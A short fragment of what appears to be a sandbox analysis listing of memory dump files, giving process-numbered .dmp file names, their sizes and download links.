7.7MB

Download
memory/1756-3-0x0000000005350000-0x0000000005978000-memory.dmp

Filesize
6.2MB

Download
memory/3180-83-0x0000000005CA0000-0x0000000005FF4000-memory.dmp

Filesize
3.3MB

Download
memory/4076-100-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/4076-104-0x000000006E4E0000-0x000000006E4F2000-memory.dmp

Filesize
72KB

Download